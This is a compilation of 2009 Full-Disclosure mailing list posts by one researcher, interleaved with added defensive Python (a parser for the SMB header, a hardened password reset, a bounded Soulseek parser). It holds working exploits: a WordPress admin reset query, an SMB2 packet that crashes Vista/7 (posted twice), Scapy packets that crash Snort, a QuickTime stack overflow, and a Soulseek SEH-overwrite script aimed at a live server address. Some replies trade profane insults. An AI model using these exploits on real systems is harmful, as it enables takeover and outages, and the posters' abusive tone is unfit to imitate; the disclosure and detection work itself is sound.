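    """Model of $wpdb->prepare() (assumed from the WP 2.8 source): a lone
    array argument is unpacked as the vsprintf() argument list, so ['']
    formats the %s placeholder as the literal '' instead of failing."""
    args = arg if isinstance(arg, list) else [arg]
    return query.replace("%s", "'%s'") % tuple(str(a) for a in args)


def get_row(sql):
    """Stand-in for $wpdb->get_row(): match the quoted key in the WHERE."""
    wanted = sql.split("user_activation_key = ")[1].strip("'")
    return next((u for u in USERS
                 if u["user_activation_key"] == wanted), None)


def reset_password_vulnerable(key):
    """Control flow of reset_password() in wp-login.php <= 2.8.3."""
    key = php_preg_strip(key)
    if php_empty(key):
        return "invalid_key"
    user = get_row(wpdb_prepare(
        "SELECT * FROM wp_users WHERE user_activation_key = %s", key))
    if user is None:
        return "invalid_key"
    return "reset:" + user["user_login"]


def reset_password_hardened(key):
    """Hardened form: refuse anything that is not a non-empty string, and
    never run the lookup with a blank key, so a user whose activation key
    is empty cannot be selected by accident."""
    if not isinstance(key, str):
        return "invalid_key"
    key = php_preg_strip(key)
    if not key:
        return "invalid_key"
    user = next((u for u in USERS if u["user_activation_key"] == key), None)
    if user is None:
        return "invalid_key"
    return "reset:" + user["user_login"]
```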

Re: [Full-disclosure] WordPress <= 2.8.3 Remote admin reset password

2009-08-10 Thread laurent gaffie
Hi there,
"What would the "attacker" submit as a query to the server?"

Simply:
/wp-login.php?action=rp&key[]=

And the admin passwd would be reset.

Regards.


2009/8/11 Rafal M. Los 

>  Hi Laurent,
> Pardon my stupidity... I seem to be missing something tonight.  Can
> you explain a little further for someone who doesn’t have coding (php)
> background?  What would the "attacker" submit as a query to the server?
> What specifically triggers the vulnerability?
> .
>
> Rafal M. Los
> Security & IT Risk Strategist
>
>  - Blog: http://preachsecurity.blogspot.com
>  - LinkedIn:  http://www.linkedin.com/in/rmlos
>  - Twitter: http://twitter.com/RafalLos
>
>  *From:* laurent gaffie 
> *Sent:* Monday, August 10, 2009 9:09 PM
> *To:* full-disclosure@lists.grok.org.uk
> *Subject:* [Full-disclosure] WordPress <= 2.8.3 Remote admin reset
> password
>

Re: [Full-disclosure] WordPress <= 2.8.3 Remote admin reset password

2009-08-10 Thread laurent gaffie
"Rafal M. Los
Security & IT Risk Strategist"

where  ?

@home ?
oh boy.



2009/8/11 Rafal M. Los 

>  Empty reply... on purpose or...?
> .
>
> Rafal
>
>  *From:* laurent gaffie 
> *Sent:* Monday, August 10, 2009 11:43 PM
> *To:* Rafal M. Los 
> *Subject:* Re: [Full-disclosure] WordPress <= 2.8.3 Remote admin reset
> password
>
>
>

Re: [Full-disclosure] WordPress <= 2.8.3 Remote admin reset password

2009-08-10 Thread laurent gaffie
Dude, your email is more funny than serious.
It's a pure troll.
Whatever from now on.

Re: [Full-disclosure] WordPress <= 2.8.3 Remote admin reset password

2009-08-10 Thread laurent gaffie
Mr Fabio,

You don't even understand the bug, so please shut the hell up.






2009/8/11 Fabio N Sarmento [ Gmail ] 

> if this is a bug, please close Twitter.com, MSN.com and other services,
> because they have the same stupid "Reset password" service.
>
> So please make my day, and create a stupid script to flood with multiple
> requests to reset password.
>
> LOL
>
> 2009/8/10 Jeremy Brown <0xjbrow...@gmail.com>
>
>> I'm guessing you're not a WordPress administrator, Fabio. Nice find
>> Laurent, as usual.
>>

Re: [Full-disclosure] Microsoft Internet Information Server ftpd zeroday

2009-08-31 Thread laurent gaffie
Nice find Kingcope,
As Thierry mentioned, I guess it was a pain to find; nice one as
always, your finding rocks.
Cheers

2009/8/31 r1d1nd1rty 

> why would anyone write a 0day with...
>
> # bug found & exploited by Kingcope, kcope2googlemail.com
> # Affects IIS6 with stack cookie protection
> # August 2009 - KEEP THIS 0DAY PRIV8
>
> ... then plaster it all over the internet? have you forgotten what
> you, yourself wrote?
>
> if you guys really wanna get that famous.. perhaps you should
> consider a new career - nobody even likes h4ck3rs these days anyway
> (especially james and da internet po-po).
>
> and please put a fkn' sleep in ur while(1)'s after a fork()... it
> appears as though you couldn't WAIT to get this one out...
>
> /rd
>
> remember to always r1d3 d1r7y n' bounce em.
>
> On Mon, 31 Aug 2009 16:31:51 -0400 Kingcope 
> wrote:
> >Hello list,
> >
> >I have to clarify some things on the globbing vulnerability here.
> >The posted PoC (with the fine art) does NOT exploit IIS6 ftp servers,
> >IIS6 ftp server IS affected by the buffer overflow but is properly
> >protected by stack canaries. AFAIK it looks like a DoS on Windows Server
> >2003.
> >Until someone finds a way to bypass Stack Canaries on recent Windows
> >versions this remains a DoS on IIS6.
> >
> >Thanks to HD Moore and all people who in the past wrote exploits for
> >my releases!
> >Kudos!
> >
> >Nikolaos
> >
> >2009/8/31 Kingcope :
> >> (see attachment)
> >>
> >> Cheerio,
> >>
> >> Kingcope
> >>
> >

[Full-disclosure] Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.

2009-09-07 Thread laurent gaffie
=
- Release date: September 7th, 2009
- Discovered by: Laurent Gaffié
- Severity: Medium/High
=

I. VULNERABILITY
-
Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.

II. BACKGROUND
-
Windows Vista and newer Windows versions come with a new SMB version named SMB2.
See:
http://en.wikipedia.org/wiki/Windows_Vista_networking_technologies#Server_Message_Block_2.0
for more details.

III. DESCRIPTION
-
SRV2.SYS fails to handle malformed SMB headers for the NEGOTIATE PROTOCOL
REQUEST functionality.
The NEGOTIATE PROTOCOL REQUEST is the first SMB query a client sends to an SMB
server, and it's used to identify the SMB dialect that will be used for
further communication.

IV. PROOF OF CONCEPT
-

Smb-Bsod.py:

#!/usr/bin/python
# When SMB2.0 receives a "&" char in the "Process Id High" SMB header field
# it dies with a PAGE_FAULT_IN_NONPAGED_AREA

from socket import socket

host = "IP_ADDR", 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negotiate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26"         # Process ID High: --> :) normal value should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
)
s = socket()
s.connect(host)
s.send(buff)
s.close()

V. BUSINESS IMPACT
-
An attacker can remotely crash, without any user interaction, any Vista/Windows
7 machine with SMB enabled.
Windows XP and 2000 are NOT affected as they don't have this driver.

VI. SYSTEMS AFFECTED
-
Windows Vista/7 All (64b/32b|SP1/SP2 fully updated) and possibly Win Server
2008, as it uses the same SMB2.0 driver (not tested).

VII. SOLUTION
-
Vendor contacted, but no patch available for the moment.
Disable the SMB feature and close its ports until a patch is provided.

VIII. REFERENCES
-
http://microsoft.com

IX. CREDITS
-
This vulnerability has been discovered by Laurent Gaffié
Laurent.gaffie{remove-this}(at)gmail.com
http://g-laurent.blogspot.com/

X. LEGAL NOTICES
-
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or
misuse of this information.

Re: [Full-disclosure] Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.

2009-09-11 Thread laurent gaffie
Advisory updated :


=
- Release date: September 7th, 2009
- Discovered by: Laurent Gaffié
- Severity: High
=

I. VULNERABILITY
-
Windows Vista, Server 2008 < R2, 7 RC :
SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.

II. BACKGROUND
-
Windows Vista and newer Windows versions come with a new SMB version named SMB2.
See:
http://en.wikipedia.org/wiki/Windows_Vista_networking_technologies#Server_Message_Block_2.0
for more details.

III. DESCRIPTION
-
[Edit] Unfortunately this SMB2 security issue is specifically due to an MS
patch for another SMB2.0 security issue:
KB942624 (MS07-063)
Installing only this specific update on Vista SP0 creates the following
issue:

SRV2.SYS fails to handle malformed SMB headers for the NEGOTIATE PROTOCOL
REQUEST functionality.
The NEGOTIATE PROTOCOL REQUEST is the first SMB query a client sends to an SMB
server, and it's used to identify the SMB dialect that will be used for
further communication.

IV. PROOF OF CONCEPT
-

Smb-Bsod.py:

#!/usr/bin/python
#When SMB2.0 receives a "&" char in the "Process Id High" SMB header field
#it dies with a PAGE_FAULT_IN_NONPAGED_AREA error

from socket import socket

host = "IP_ADDR", 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negotiate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26"         # Process ID High: --> :) normal value should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
)
s = socket()
s.connect(host)
s.send(buff)
s.close()

V. BUSINESS IMPACT
-
An attacker can remotely crash any Vista/Windows 7 machine with SMB enabled.
Windows XP and 2000 are NOT affected as they don't have this driver.

VI. SYSTEMS AFFECTED
-
[Edit]Windows Vista All (64b/32b|SP1/SP2 fully updated), Win Server 2008 <
R2, Windows 7 RC.

VII. SOLUTION
-
No patch available for the moment.
Disable the SMB feature and close its ports until a patch is provided.
Configure your firewall properly.
You can also follow the MS workaround:
http://www.microsoft.com/technet/security/advisory/975497.mspx

VIII. REFERENCES
-
http://www.microsoft.com/technet/security/advisory/975497.mspx
http://blogs.technet.com/msrc/archive/2009/09/08/microsoft-security-advisory-975497-released.aspx

IX. CREDITS
-
This vulnerability has been discovered by Laurent Gaffié
Laurent.gaffie{remove-this}(at)gmail.com

X. REVISION HISTORY
-
September 7th, 2009: Initial release
September 11th, 2009: Revision 1.0 release

XI. LEGAL NOTICES
-
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or
misuse of this information.

XII.Personal Notes
-
Many people have suggested updating this advisory to RCE rather than BSOD:
it won't be done; if they find a way to execute code, they will publish their
own advisory.
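
The header layout that both the original advisory and its update above rely on, as an added example that is not part of the original posts: a parser for the NetBIOS-framed SMB1 NEGOTIATE PROTOCOL REQUEST plus a check, written from the detection side, that flags a non-zero Process ID High field of the kind the PoC sends. build_negotiate() constructs the sample inputs (the same dialect list as the PoC); field offsets follow the standard 32-byte SMB1 header.

```python
import struct

SMB_MAGIC = b"\xffSMB"
SMB_COM_NEGOTIATE = 0x72

# Dialect strings offered by the advisory's PoC; the last one asks for SMB2.
DIALECTS = [
    b"PC NETWORK PROGRAM 1.0", b"LANMAN1.0", b"Windows for Workgroups 3.1a",
    b"LM1.2X002", b"LANMAN2.1", b"NT LM 0.12", b"SMB 2.002",
]


def build_negotiate(pid_high=0):
    """Constructed sample input: a NetBIOS session message carrying an SMB1
    NEGOTIATE request. pid_high=0 is the normal value; the PoC's bytes
    00 26 put 0x2600 (little-endian) in that field."""
    data = b"".join(b"\x02" + d + b"\x00" for d in DIALECTS)
    header = struct.pack(
        "<4sB4sBHH8sHHHHH",
        SMB_MAGIC, SMB_COM_NEGOTIATE, b"\x00" * 4,   # magic, command, status
        0x18, 0xC853, pid_high,                      # flags, flags2, PID high
        b"\x00" * 8, 0,                              # signature, reserved
        0xFFFF, 0xFEFF, 0, 0,                        # TID, PID, UID, MID
    )
    body = struct.pack("<BH", 0, len(data)) + data   # WordCount, ByteCount
    smb = header + body
    return struct.pack(">I", len(smb)) + smb         # NetBIOS session header


def parse_smb1(raw):
    """Parse the NetBIOS session header plus the 32-byte SMB1 header and,
    for a NEGOTIATE, the WordCount/ByteCount/dialect body.
    Returns a dict of fields, or None when the framing does not add up."""
    if len(raw) < 36 or raw[0] != 0:
        return None
    nb_len = int.from_bytes(raw[1:4], "big")
    smb = raw[4:4 + nb_len]
    if len(smb) < 32 or len(smb) != nb_len or smb[:4] != SMB_MAGIC:
        return None
    (command, flags, flags2, pid_high,
     tid, pid, uid, mid) = struct.unpack("<B4xBHH8x2xHHHH", smb[4:32])
    fields = dict(command=command, flags=flags, flags2=flags2,
                  pid_high=pid_high, tid=tid, pid=pid, uid=uid, mid=mid,
                  word_count=None, byte_count=None, data_len=0, dialects=[])
    if command == SMB_COM_NEGOTIATE and len(smb) >= 35:
        fields["word_count"] = smb[32]
        fields["byte_count"] = struct.unpack("<H", smb[33:35])[0]
        data = smb[35:35 + fields["byte_count"]]
        fields["data_len"] = len(data)
        fields["dialects"] = [d[1:] for d in data.split(b"\x00")
                              if d.startswith(b"\x02")]
    return fields


def negotiate_findings(raw):
    """Detection side: list what is wrong with a NEGOTIATE request, checking
    first the Process ID High field the advisory abuses. Empty list = clean;
    commands other than NEGOTIATE are out of scope and return []."""
    pkt = parse_smb1(raw)
    if pkt is None:
        return ["not a well-formed NetBIOS/SMB1 message"]
    if pkt["command"] != SMB_COM_NEGOTIATE:
        return []
    findings = []
    if pkt["pid_high"] != 0:
        findings.append("Process ID High is 0x%04x, expected 0"
                        % pkt["pid_high"])
    if pkt["word_count"] != 0:
        findings.append("WordCount is %r, expected 0 for NEGOTIATE"
                        % pkt["word_count"])
    if pkt["byte_count"] != pkt["data_len"]:
        findings.append("ByteCount does not match the dialect data present")
    if not pkt["dialects"]:
        findings.append("no dialect strings offered")
    return findings
```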

Re: [Full-disclosure] Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.

2009-10-04 Thread laurent gaffie
More explication on CVE-2009-3103

http://g-laurent.blogspot.com/2009/10/more-explication-on-cve-2009-3103.html

[Full-disclosure] Snort <= 2.8.5 IPV6 Remote DoS

2009-10-22 Thread laurent gaffie
=
- Date: October 22nd, 2009
- Discovered by: Laurent Gaffié
- Severity: Low
=

I. VULNERABILITY
-
Snort <= 2.8.5 IPV6 Remote DoS


II. DESCRIPTION
-
A remote DoS was present in Snort 2.8.5 when parsing some specially crafted
IPv6 packets.
To trigger these bugs you need to have compiled Snort with the
--enable-ipv6 option, and run it in verbose mode (-v).

III. PROOF OF CONCEPT
-
You can reproduce these two different bugs easily by using the Python
low-level networking lib Scapy
(http://www.secdev.org/projects/scapy/files/scapy-latest.zip)

1) # only works on x86

#!/usr/bin/env python
from scapy.all import *
u = "\x92" + "\x02" * 6
send(IPv6(dst="IPv6_addr_here", nh=6)/u)  # nh=6 -> TCP

2) # works on x86, x64

#!/usr/bin/env python
from scapy.all import *

z = "Q" * 30
send(IPv6(dst="IPv6_ADDR_HERE", nh=1)/ICMPv6NIQueryNOOP(type=4)/z)  # nh=1 -> ICMP (not v6)


IV. SYSTEMS AFFECTED
-
These proofs of concept have been tested on Snort:
- 2.8.5

V. NOT AFFECTED
-
Sourcefire 3D Sensor


VI. SOLUTION
-
A new version correcting these issues has been released (2.8.5.1):

http://www.snort.org/downloads


VII. REFERENCES
-
http://www.snort.org/
http://vrt-sourcefire.blogspot.com/

VIII. REVISION HISTORY
-
October 14th, 2009: First issue discovered, advisory sent to the Snort team.
October 14th, 2009: Snort security team confirms the bug.
October 16th, 2009: Second issue discovered, advisory sent to the Snort team.
October 20th, 2009: Snort security team confirms the bug.
October 22nd, 2009: Snort team releases a new version.


IX. CREDITS
-
This vulnerability has been discovered by Laurent Gaffié
Laurent.gaffie{remove-this}(at)gmail.com

[Full-disclosure] Hash

2009-10-26 Thread laurent gaffie
For the record :
/usr/bin/shasum advisory.txt
9fefeeb9d3ebf7c6822961e59ae94cfb655bcd53  advisory.txt

Regards,

[Full-disclosure] QuickTime <= 7.4.1 QTPlugin.ocx Multiple Remote Stack Overflow

2008-02-13 Thread laurent gaffie
Application: QuickTime <= 7.4.1 QTPlugin.ocx Multiple Remote Stack Overflow

Web Site: http://www.apple.com/fr/quicktime/download/

Platform: Windows

Bug: Multiple Remote Stack Overflow

---

1) Introduction

2) Bug

3) Proof of concept

4) Credits

===

1) Introduction

===

A nice introduction to Quicktime Player can be found here :
http://www.apple.com/quicktime/player/

==

2) Bug

==

Stack Overflow/Denial of service occurs when supplying a long string to
these functions:

-SetBgColor
-SetHREF
-SetMovieName
-SetTarget
-SetMatrix

=

3) Proof of concept

=

Proof of concept example [works with the other functions supplied in
section 2) ] :




sub test()
bar = String(515305, "A")
foo.SetBgColor bar
End Sub



=

4) Credits

=
laurent gaffié
laurent.gaffie{remove_this}[at]gmail[dot]com

[Full-disclosure] Soulseek * P2P Remote Distributed Search Code Execution

2009-05-25 Thread laurent gaffie
=
- Release date: May 24th, 2009
- Discovered by: Laurent Gaffié
- Severity: critical
=

I. VULNERABILITY
-
Soulseek 157 NS * & 156.* Remote Distributed Search Code Execution

II. BACKGROUND
-
"Soulseek(tm) is a unique ad-free, spyware free, and just plain free file
sharing application.
One of the things that makes Soulseek(tm) unique is our community and
community-related features.
Based on peer-to-peer technology, virtual rooms allow you to meet people with
the same interests, share information, and chat freely using real-time
messages in public or private.
Soulseek(tm), with its built-in people matching system, is a great way to
make new friends and expand your mind!"

III. DESCRIPTION
-
The Soulseek client allows a distributed file search to one person, everyone,
or a specific Soulseek IRC channel, allowing a user to find the files he wants
in a dedicated channel, with his contacts, or on the whole network.
Unfortunately this feature is vulnerable to a remote SEH overwrite, targeting
a specific user or even a whole Soulseek IRC channel.

IV. PROOF OF CONCEPT
-
This proof of concept is made to prevent a S-K party; it is only built to
target the user "testt4321".

To try this proof of concept, you would have to open a Soulseek client and use
the username:
"testt4321"
with the password:
"12345678"
And launch this code.
If you want to change the username or target a whole channel, you would have
to reverse the binary protocol.



#!/usr/bin/python
import struct
import socket
from time import sleep

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("208.76.170.50",2242))  # Change to Port 2240 for 156* branch

# Login (server message code 1): username, password, client version,
# hash string and minor version, each string prefixed by its uint32 length
buffer = b"\x48\x00\x00\x00\x01\x00\x00\x00\x08\x00\x00\x00\x74\x65\x73\x74"
buffer+= b"\x34\x33\x32\x31\x08\x00\x00\x00\x31\x32\x33\x34\x35\x36\x37\x38"
buffer+= b"\xb5\x00\x00\x00\x20\x00\x00\x00\x38\x65\x39\x31\x66\x37\x33\x30"
buffer+= b"\x35\x35\x37\x31\x32\x35\x64\x37\x34\x39\x32\x34\x62\x64\x66\x35"
buffer+= b"\x63\x32\x39\x61\x36\x37\x64\x61\x01\x00\x00\x00"

s.send(buffer)
sleep(1)

# Search query: padding, then the SEH record (next pointer + handler), then trailer.
# The two SEH values are the 0x42424242 / 0x43434343 shown in the advisory's memory dump.
junk = b"\x41" * 3084
next_seh = struct.pack('<L', 0x42424242)
seh = struct.pack('<L', 0x43434343)
other_junk = b"\x61" * 1423

# UserSearch (code 42) aimed at "testt4321", carrying the oversized query
buffer2 = b"\x01\x0f\x00\x00\x2a\x00\x00\x00\x09\x00\x00\x00\x74\x65\x73\x74"
buffer2+= b"\x74\x34\x33\x32\x31\xa4\x5a\x51\x44\xe8\x0e\x00\x00"+junk+next_seh+seh+other_junk
s.send(buffer2)
sleep(1)
s.recv(1024)

http://nicotine-plus.sourceforge.net/), a Python Soulseek client.
Another quick workaround (at server level) would be to limit the search
query length.

VIII. REFERENCES
-
http://www.slsknet.org

IX. CREDITS
-
This vulnerability has been discovered by Laurent Gaffié
Laurent.gaffie{remove-this}(at)gmail.com


X. REVISION HISTORY
-
May 24, 2009: Initial release


XI. DISCLOSURE TIMELINE
-
July 29, 2008: Bug discovered
September 03, 2008: Vendor contacted; no response.
October 14, 2008: Vendor contacted; still no response.
April 12, 2009: iDefense contacted.
April 13, 2009: iDefense answered.
April 23, 2009: Advisory sent to the iDefense contributor program.
May 13, 2009: iDefense contacted, bug rejected (no reason given)
May 15, 2009: iDefense recontacted; no answer.
May 16, 2009: Last try to contact Soulseek maintainers
May 24, 2009: Advisory published.

XII. LEGAL NOTICES
-
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or
misuse of this information.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
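The advisory hard-codes its two frames and says that aiming at another user means reversing the binary protocol. The Python 3 example below is added here and is not part of the advisory or of Soulseek: it rebuilds the UserSearch frame (message code 42, as read from the PoC's buffer2) from its fields and then parses it with the bounded, length-checked reader a client would need in order to apply the "limit the search query length" workaround. The framing (little-endian uint32 frame length, uint32 code, uint32-prefixed strings) is taken from the PoC bytes; the 1024-byte query cap and 64-byte username cap are assumptions, and the SEH values 0x42424242 / 0x43434343 are the ones in the advisory's memory dump.

```python
import struct

USER_SEARCH = 42          # message code seen in the PoC's buffer2 (0x2a)
MAX_QUERY_LEN = 1024      # assumed cap; the advisory only says to limit the length
MAX_USERNAME_LEN = 64     # assumed


def pack_string(data):
    """Soulseek string: little-endian uint32 length followed by the raw bytes."""
    return struct.pack("<I", len(data)) + data


def build_user_search(username, token, query):
    """Frame a UserSearch: uint32 length, uint32 code, string, uint32 token, string."""
    body = (struct.pack("<I", USER_SEARCH) + pack_string(username)
            + struct.pack("<I", token) + pack_string(query))
    return struct.pack("<I", len(body)) + body


class Cursor:
    """Bounded reader: every read is checked against the bytes actually present."""

    def __init__(self, data):
        self.data = data
        self.pos = 0

    def take(self, n):
        if n < 0 or self.pos + n > len(self.data):
            raise ValueError("read of %d bytes at offset %d runs past the end (%d bytes)"
                             % (n, self.pos, len(self.data)))
        chunk = self.data[self.pos:self.pos + n]
        self.pos += n
        return chunk

    def u32(self):
        return struct.unpack("<I", self.take(4))[0]

    def string(self, limit):
        length = self.u32()
        if length > limit:
            raise ValueError("string length %d exceeds limit %d" % (length, limit))
        return self.take(length)

    def remaining(self):
        return len(self.data) - self.pos


def parse_user_search(frame, max_query=MAX_QUERY_LEN):
    """Decode one framed UserSearch, rejecting every length inconsistency."""
    if len(frame) < 4:
        raise ValueError("frame shorter than its length prefix")
    declared = struct.unpack("<I", frame[:4])[0]
    body = frame[4:]
    if declared != len(body):
        raise ValueError("frame announces %d bytes but carries %d" % (declared, len(body)))
    cur = Cursor(body)
    code = cur.u32()
    if code != USER_SEARCH:
        raise ValueError("unexpected message code %d" % code)
    username = cur.string(MAX_USERNAME_LEN)
    token = cur.u32()
    query = cur.string(max_query)
    if cur.remaining():
        raise ValueError("%d trailing bytes after the query" % cur.remaining())
    return username, token, query


def rejects(frame, **kw):
    """True if parse_user_search refuses the frame."""
    try:
        parse_user_search(frame, **kw)
    except ValueError:
        return True
    return False


# The advisory's buffer2, rebuilt from its parts (SEH values from its memory dump).
JUNK = b"\x41" * 3084
NEXT_SEH = struct.pack("<L", 0x42424242)
SEH = struct.pack("<L", 0x43434343)
OTHER_JUNK = b"\x61" * 1423
POC_QUERY = JUNK + NEXT_SEH + SEH + OTHER_JUNK
POC_FRAME = (b"\x01\x0f\x00\x00\x2a\x00\x00\x00\x09\x00\x00\x00\x74\x65\x73\x74"
             b"\x74\x34\x33\x32\x31\xa4\x5a\x51\x44\xe8\x0e\x00\x00" + POC_QUERY)

if __name__ == "__main__":
    print(parse_user_search(build_user_search(b"testt4321", 0x44515aa4, b"some album")))
    try:
        parse_user_search(POC_FRAME)
    except ValueError as exc:
        print("PoC frame rejected:", exc)
```

Run stand-alone it prints the decoded normal search and then the reason the PoC frame is refused: its length prefix (0x0f01) does not match the 4540 bytes that follow, so a checked reader never reaches the query at all; even a frame with consistent lengths is refused by the query cap.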

Re: [Full-disclosure] Soulseek * P2P Remote Distributed Search Code Execution

2009-06-04 Thread laurent gaffie
It seems like you're an asshole, and also it seems you have some undisclosed
brain-prick activity, which means that I should forward all the spam I get to
you, including "*Ritalin solution*", get valium, and clearly: enlarge your
penis (as your girlfriend asked me to make that call for you).

Now if you please, get the fuck out of this mailing list, and get a life,
kid.



2009/6/5 Pete Licoln 

> Seems like you have a problem with responsible disclosure, kid ;
> Do you have any family relationship with Jeremy Brown ? ;P
>
>
> http://g-laurent.blogspot.com/2009/05/soulseek-p2p-remote-distributed-search.html#comments
>
> 2009/5/25 Pete Licoln 
>
>  Oh so you have a blog ...
>> http://g-laurent.blogspot.com/
>>
>> 2009/5/25 laurent gaffie 
>>
>>>  =
>>> - Release date: May 24th, 2009
>>> - Discovered by: Laurent Gaffié
>>> - Severity: critical
>>> =
>>>
>>> I. VULNERABILITY
>>> -
>>> Soulseek 157 NS * & 156.* Remote Distributed Search Code Execution
>>>
>>> II. BACKGROUND
>>> -
>>> "Soulseek(tm) is a unique ad-free, spyware free, and just plain free file
>>>
>>> sharing application.
>>> One of the things that makes Soulseek(tm) unique is our community and
>>> community-related features.
>>> Based on peer-to-peer technology, virtual rooms allow you to meet people
>>> with
>>> the same interests, share information, and chat freely using real-time
>>> messages
>>> in public or private.
>>> Soulseek(tm), with its built-in people matching system, is a great way to
>>> make
>>> new friends and expand your mind!"
>>>
>>> III. DESCRIPTION
>>> -
>>> The Soulseek client allows a distributed file search to be sent to one
>>> person, to everyone, or to a specific Soulseek IRC channel, letting a
>>> user find the files he wants in a dedicated channel, among his contacts,
>>> or on the whole network.
>>> Unfortunately this feature is vulnerable to a remote SEH overwrite,
>>> triggered against a specific user or even against a whole Soulseek IRC
>>> channel.
>>>
>>> IV. PROOF OF CONCEPT
>>> -
>>> This proof of concept is made to prevent an S-K party; it is only built
>>> to target the user "testt4321".
>>>
>>> To try this proof of concept, you would have to open a Soulseek client
>>> and use the username:
>>> "testt4321"
>>> with the password:
>>> "12345678"
>>> And launch this code.
>>> If you want to change the username or target a whole channel, you would
>>> have to reverse the binary protocol.
>>>
>>>
>>>
>>> #!/usr/bin/python
>>> import struct
>>> import socket
>>> from time import sleep
>>>
>>> s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
>>> s.connect(("208.76.170.50",2242))  # Change to Port 2240 for 156* branch
>>>
>>> # Login (server message code 1): username, password, client version,
>>> # hash string and minor version, each string prefixed by its uint32 length
>>> buffer = b"\x48\x00\x00\x00\x01\x00\x00\x00\x08\x00\x00\x00\x74\x65\x73\x74"
>>> buffer+= b"\x34\x33\x32\x31\x08\x00\x00\x00\x31\x32\x33\x34\x35\x36\x37\x38"
>>> buffer+= b"\xb5\x00\x00\x00\x20\x00\x00\x00\x38\x65\x39\x31\x66\x37\x33\x30"
>>> buffer+= b"\x35\x35\x37\x31\x32\x35\x64\x37\x34\x39\x32\x34\x62\x64\x66\x35"
>>> buffer+= b"\x63\x32\x39\x61\x36\x37\x64\x61\x01\x00\x00\x00"
>>>
>>> s.send(buffer)
>>> sleep(1)
>>>
>>> # Search query: padding, then the SEH record (next pointer + handler), then trailer.
>>> # The two SEH values are the 0x42424242 / 0x43434343 shown in the memory dump below.
>>> junk = b"\x41" * 3084
>>> next_seh = struct.pack('<L', 0x42424242)
>>> seh = struct.pack('<L', 0x43434343)
>>> other_junk = b"\x61" * 1423
>>>
>>> # UserSearch (code 42) aimed at "testt4321", carrying the oversized query
>>> buffer2 = b"\x01\x0f\x00\x00\x2a\x00\x00\x00\x09\x00\x00\x00\x74\x65\x73\x74"
>>> buffer2+= b"\x74\x34\x33\x32\x31\xa4\x5a\x51\x44\xe8\x0e\x00\x00"+junk+next_seh+seh+other_junk
>>> s.send(buffer2)
>>> sleep(1)
>>> s.recv(1024)
>>>
>>>
>>>
>>> After the query is sent, the memory will look like this
>>> 0012FBE4   41414141
>>> 0012FBE8   42424242  Pointer to next SEH record
>>> 0012FBEC   43434343  SE handler
>>> 0012FBF0   61616161
>>>
>>> And the program will terminate with this stru

Re: [Full-disclosure] Apple QuickTime 0day

2009-06-15 Thread laurent gaffie
Hi WebDEVIL,

You base your PoC on this plugin (http://www.codeplex.com/msecdbg) for
windbg (as copy/pasted), but I wonder, what makes you think it's really
exploitable (on QuickTime)?
Have you tried that PoC on iTunes?
iTunes uses QuickTime as a module to read .mov files, but iTunes doesn't
have the same memory protection as QuickTime; for example see
http://milw0rm.com/exploits/7296 , it still works on the latest one today
[iTunes 8.2.0.23]

What do you get with your PoC when you play with it on iTunes?

Thanks





2009/6/15 webDEViL 

> Try it with your latest quicktime player.
> --
>
> #0:000> !exploitable -v
> #HostMachine\HostUser
> #Executing Processor Architecture is x86
>
> #Debuggee is in User Mode
> #Debuggee is a live user mode debugging session on the local machine
> #Event Type: Exception
> #Exception Faulting Address: 0x66830f9b
> #First Chance Exception Type: STATUS_STACK_OVERFLOW (0xC0FD)
>
> #
